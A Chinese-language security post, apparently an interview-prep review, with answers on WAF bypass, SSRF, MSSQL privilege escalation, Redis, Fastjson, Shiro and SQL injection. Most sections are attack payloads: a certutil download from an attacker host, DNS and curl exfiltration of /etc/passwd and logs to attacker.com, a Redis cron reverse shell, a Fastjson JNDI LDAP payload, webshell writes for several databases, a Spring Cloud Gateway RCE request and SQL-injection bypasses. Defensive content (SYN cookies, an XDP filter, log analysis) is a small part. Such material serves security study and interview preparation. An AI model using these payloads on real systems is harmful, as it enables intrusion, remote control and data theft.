短剧小程序搭建_增长超人网站建设价格_西安seo培训学校_百度导航

网络安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。

目录

某四字大厂面试复盘 二面

一、文件上传WAF绕过技术（实战场景深度解析）

二、SSRF深度利用与WAF对抗

三、MSSQL深度提权技术

四、无回显RCE检测体系

五、多数据库写shell技术矩阵

六、大型日志分析实战流程

七、Redis未授权漏洞攻击全景

八、SYN Flood攻防体系

九、UDP反射放大攻击全解

某四字大厂面试复盘 三面

一、Padding Oracle Attack原理详解

二、Fastjson反序列化漏洞全解析

三、反序列化触发函数全景图

四、Shiro550攻击技术深度解构

五、经典RCE漏洞案例剖析

六、SQL注入WAF绕过技术矩阵

七、分块传输编码突破方案

八、文件上传绕过艺术

---

 

某四字大厂面试复盘 二面

文件上传如何绕waf
SSRF的利用和绕waf的手段
谈谈MSSQL如果XPCMDSHELL不能用怎么拿shell
遇到没回显的RCE怎么办
不能用SQLMAP的OS-SHELL，各种数据库如何写SHELL
给你一个比较大的日志，应该如何分析
redis未授权会导致哪些问题
讲讲SYN FLOOD原理，防御，检测手段
讲讲UDP反射放大的原理，防御，检测手段

一、文件上传WAF绕过技术（实战场景深度解析）

1. MIME混淆进阶

• 复合型Content-Type：image/png; charset=text/plain
• 动态MIME构造：利用随机字符填充如Content-Type: image/gif\x0D\x0B

1. 文件结构变异技术

• 文件头注入：在真实payload前插入GIF89a+500字节填充数据
• 多文件嵌套：构造ZIP压缩包内嵌PHP文件，配合.htaccess设置解析规则

1. 分块传输编码攻击   http

POST /upload.php HTTP/1.1 Transfer-Encoding: chunked 7\r\n <?php\r\n 0\r\n \r\n

通过分块传输绕过正则匹配边界

1. 云WAF特性突破

• CDN边缘节点缓存污染：filename="test.php; cache-control: max-age=31536000"
• 混合编码payload：%E6%B5%8B%E8%AF%95.php （UTF-8编码中文）

二、SSRF深度利用与WAF对抗

1. 协议层逃逸技术

• 利用gopher://协议构造POST请求：

gopher://127.0.0.1:80/_POST%20/admin/deleteAll%20HTTP/1.1%0D%0AHost:%20localhost%0D%0A

• dict://协议Redis未授权访问探测：dict://127.0.0.1:6379/info

2. 新型绕过向量

• IPv6压缩格式：[::127.0.0.1]
• DNS重绑定攻击：使用TTL=0的域名解析服务
• 特殊域名构造：127.0.0.1.xip.io → 127.0.0.1

3. 云环境突破

• AWS元数据API V2绕过：X-aws-ec2-metadata-token: TTL=21600
• Kubernetes API渗透路径：/proc/net/arp获取容器网络拓扑

三、MSSQL深度提权技术

1. 替代存储过程利用链  sql

EXEC sp_configure 'Ole Automation Procedures',1 RECONFIGURE DECLARE @shell INT EXEC sp_oacreate 'wscript.shell',@shell OUT EXEC sp_oamethod @shell,'run',null,'cmd /c certutil -urlcache -split -f http://attacker/shell.exe'

2. CLR组件注入sql

CREATE ASSEMBLY SqlClr FROM '\\attacker\malicious.dll' WITH PERMISSION_SET = UNSAFE CREATE PROCEDURE sp_cmdExec AS EXTERNAL NAME SqlClr.StoredProcedures.CmdExec

3. 数据库镜像写shell  sql

BACKUP DATABASE test TO DISK='C:\inetpub\wwwroot\backup.bak' WITH DIFFERENTIAL,FORMAT DROP DATABASE test ALTER DATABASE test SET ONLINE WITH EMERGENCY

四、无回显RCE检测体系

1. 多维度外带通道

• ICMP隧道：ping -c 4 $(whoami|xxd -p -c 16).attacker.com
• DNS隐蔽信道：dig @8.8.8.8 $(cat /etc/passwd|base64).attacker.com
• 时序攻击：ifconfig eth0 && sleep $(grep -c root /etc/passwd)

2. 存储型信息泄露  bash

# Linux find /var/log -mtime -1 -exec curl -X POST -d @{} http://attacker.com \; # Windows wevtutil qe Security /rd:true /f:text | findstr "4624" > C:\Windows\Temp\log.txt certutil -encode C:\Windows\Temp\log.txt C:\inetpub\wwwroot\log.txt

五、多数据库写shell技术矩阵

数据库类型	写入方式	前提条件
MySQL	SELECT 0x3C3F70687020... INTO OUTFILE '/var/www/shell.php'	FILE权限+secure_file_priv
MSSQL	EXEC xp_cmdshell 'echo ^<%Response.Write("test")^%> > C:\inetpub\shell.asp'	开启xp_cmdshell
PostgreSQL	COPY (SELECT '<?php system($_GET[cmd]);?>') TO '/var/www/shell.php'	superuser权限
Oracle	UTL_FILE.PUT_LINE(FOPEN('/webroot','shell.jsp'),'<%= new java.io.File("/flag").getText() %>')	目录对象权限

六、大型日志分析实战流程

1. 异常模式识别

• 时间序列分析：awk '{print $4}' access.log | cut -d: -f2 | sort | uniq -c 统计每分钟请求量
• 慢速攻击检测：grep -E '200 [0-9]{5}' access.log 查找异常大响应

2. 关联分析引擎   python

from collections import defaultdict ip_activities = defaultdict(lambda: {'requests':[], 'status_codes':set()}) with open('access.log') as f: for line in f: ip = line.split()[0] status = line.split()[8] ip_activities[ip]['requests'].append(line) ip_activities[ip]['status_codes'].add(status) for ip, data in ip_activities.items(): if len(data['status_codes']) > 5 and '404' in data['status_codes']: print(f"Suspicious IP: {ip}")

七、Redis未授权漏洞攻击全景

1. 容器逃逸攻击链  bash

redis-cli -h target flushall echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/attacker/443 0>&1\n\n" | redis-cli -x set 1 redis-cli config set dir /var/spool/cron/ redis-cli config set dbfilename root redis-cli save

2. 主从复制RCE python

import redis master = redis.Redis(host='attacker_ip', port=6379) master.execute_command('MODULE LOAD /path/to/exp.so') slave = redis.Redis(host='target_ip', port=6379) slave.execute_command(f'SLAVEOF {attacker_ip} 6379')

八、SYN Flood攻防体系

防御矩阵：

1. 操作系统级：

   • sysctl -w net.ipv4.tcp_syncookies=2 （增强型SYN Cookie）
   • sysctl -w net.ipv4.tcp_max_syn_backlog=8192

2. 硬件级防护：

   • 启用ASIC芯片的SYN Proxy
   • 部署流量清洗设备（阈值建议：1000 SYN/s触发清洗）

检测算法：  tshark

tshark -n -q -r capture.pcap -z "io,stat,30,tcp.flags.syn==1 && tcp.flags.ack==0"

九、UDP反射放大攻击全解

协议风险评级：

协议	放大倍数	默认端口
NTP	556x	123
DNS	98x	53
Memcached	50000x	11211

云环境防御方案：

1. 启用VPC流量镜像分析
2. 部署基于eBPF的XDP过滤程序：c

SEC("xdp_drop_ntp") int xdp_drop(struct xdp_md *ctx) { void *data_end = (void *)(long)ctx->data_end; void *data = (void *)(long)ctx->data; struct ethhdr *eth = data; if (eth->h_proto == htons(ETH_P_IP)) { struct iphdr *ip = data + sizeof(*eth); if ((void*)ip + sizeof(*ip) > data_end) return XDP_PASS; if (ip->protocol == IPPROTO_UDP) { struct udphdr *udp = (void*)ip + sizeof(*ip); if ((void*)udp + sizeof(*udp) > data_end) return XDP_PASS; if (ntohs(udp->dest) == 123) { // NTP端口 return XDP_DROP; } } } return XDP_PASS; }

以上技术方案需结合具体环境进行测试，部分攻击手法仅限授权测试使用。防御体系建设应遵循纵深防御原则，建议采用AI驱动的动态防御系统，实现攻击链的实时阻断。

某四字大厂面试复盘 三面

paddind oracle attack原理
Fastjson反序列化原理以及1.2.47绕过的原理
除了redOBbject以外造成反序列化的函数有哪些
Shiro550反序列化的原理及利用工具编写思路
SPring/Struct2的RCE中印象最深的讲一讲分析过程
sql注入绕waf
分块传输绕waf
文件上传绕waf

一、Padding Oracle Attack原理详解

攻击机理：

1. CBC模式缺陷：
   • 加密流程：密文块C_i = Encrypt(P_i ⊕ C_{i-1})
   • 解密流程：P_i = Decrypt(C_i) ⊕ C_{i-1}
   • 填充验证：服务器返回不同的HTTP状态码（如200/403/500）暴露填充有效性
2. 攻击步骤：python

   for byte_pos in range(15,-1,-1): for guess_byte in range(256): crafted_iv = xor(original_iv, b'\x00'*byte_pos + bytes([guess_byte]) + xor(b'\x00'*(16-byte_pos), padding_value)) if response.status != 500: valid_byte = guess_byte ^ padding_value break

   • 通过逐字节爆破实现明文恢复，平均需要128次/字节的请求

实际案例：

• ASP.NET的__VIEWSTATE参数漏洞（CVE-2010-3332）
• TLS 1.0的CBC模式漏洞（BEAST攻击）

---

二、Fastjson反序列化漏洞全解析

1.2.47绕过原理：java

// 恶意JSON构造 { "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"ldap://attacker.com/Exploit", "autoCommit":true } // 绕过autoType检测的关键机制： Class<?> clazz = TypeUtils.getClassFromMapping(typeName); // 检查缓存 if (clazz == null) { clazz = deserializer.getTypeMapper().findClass(typeName); // 绕过黑白名单 }

攻击链构建：

1. 利用JdbcRowSetImpl触发JNDI查询
2. 通过AutoCommit属性自动触发连接
3. 结合LDAP服务加载远程恶意类

防御演进：

• 1.2.68版本引入SafeMode机制
• 启用ParserConfig.getGlobalInstance().setSafeMode(true);

---

三、反序列化触发函数全景图

语言/框架	高危函数	示例场景
Java XMLDecoder	readObject()	Weblogic CVE-2017-3506
Python pickle	loads()	Django session篡改
.NET BinaryFormatter	Deserialize()	ViewState反序列化
PHP phar	phar://流包装器	文件上传结合phar触发
Node.js	vm.runInContext()	Express框架参数污染

特殊案例：

• SnakeYAML的Yaml.load() 导致RCE（K8s相关漏洞）
• XStream的fromXML()触发任意代码执行（CVE-2021-29505）

---

四、Shiro550攻击技术深度解构

密钥硬编码漏洞：java

// 默认密钥位置 Base64.decode("kPH+bIxk5D2deZiIxcaaaA=="); // 加密流程 byte[] ser = serialize(payload); byte[] iv = randomBytes(16); byte[] ciphertext = AES_CBC_Encrypt(ser, key, iv);

工具开发要点：

1. Gadget选择链构造：java

   ObjectInputStream.readObject() -> AnnotationInvocationHandler.readObject() -> TransformedMap.checkSetValue() -> InvokerTransformer.transform()

2. 自动化检测脚本逻辑：python

   def check_shiro(url): cookies = {'rememberMe': 'deleteMe'} res = requests.get(url, cookies=cookies) return 'rememberMe=deleteMe' not in res.headers.get('Set-Cookie','')

3. 内存马注入技术：

   • 通过ClassLoader动态注册Filter型内存马
   • 绕过重启失效问题

---

五、经典RCE漏洞案例剖析

Spring Cloud Gateway CVE-2022-22947：http

POST /actuator/gateway/routes/test_route HTTP/1.1 { "filters":[{ "name":"AddResponseHeader", "args":{"name":"Result","value":"#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"} }] } # 触发执行 GET /actuator/gateway/refresh

漏洞根源：

• SpEL表达式未做沙箱过滤
• Gateway Actuator端点未授权访问

攻击演进：

• 利用JDK9+的模块特性绕过黑名单
• 结合JNDI注入实现内存马植入

---

六、SQL注入WAF绕过技术矩阵

混淆技术：sql

/*!50000select*/version()-- SEL%0bECT user() id=1 uniⓞon sel⒠ct 1,2,3 /* 利用数据库特性 */ SELECT 'a' REGEXP '^[a-z]' # MySQL布尔盲注 WHERE 1=json_array(1) # SQLite绕过

高级绕过案例：sql

CREATE TEMPORARY TABLE tmp AS SELECT 1; EXECUTE IMMEDIATE 'S'||'ELECT LOAD_FILE("/etc/passwd")';

防御建议：

• 使用参数化查询+存储过程
• 启用SQL语法树分析（如SQLGuard）

---

七、分块传输编码突破方案

编码构造技巧：http

POST /vuln HTTP/1.1 Transfer-Encoding: chunked 5; x=绕过 hello 0

变种攻击：

1. 非标准分块长度：

   0x1a; （十六进制混淆）
   

2. 多重分块嵌套：

   5\r\n 
   a=1&b=2 
   5\r\n 
   &c=3 
   0\r\n 
   

WAF检测盲区：

• 分块扩展参数解析差异（如5; key=value）
• 尾部头注入（在分块后添加恶意Header）

---

八、文件上传绕过艺术

高级绕过技术：

1. 魔法字节注入：python

   with open("shell.jpg.php", "wb") as f: f.write(b'\xFF\xD8\xFF\xE0' + b'<?php system($_GET[cmd]);?>')

2. 容器解析特性：

   • IIS 6.0：shell.asp;.jpg
   • Apache：shell.php.%20 （末尾空格）

3. 云WAF绕过：http

   Content-Disposition: form-data; name="file"; filename="shell.php\x00.jpg"

4. 动态文件检测绕过：

   • 上传SVG文件包含JS代码：<svg onload=alert(1)>
   • 利用Office文档的宏执行功能

防御纵深：

• 使用文件内容签名校验（如TrID文件识别）
• 部署沙箱执行环境进行动态检测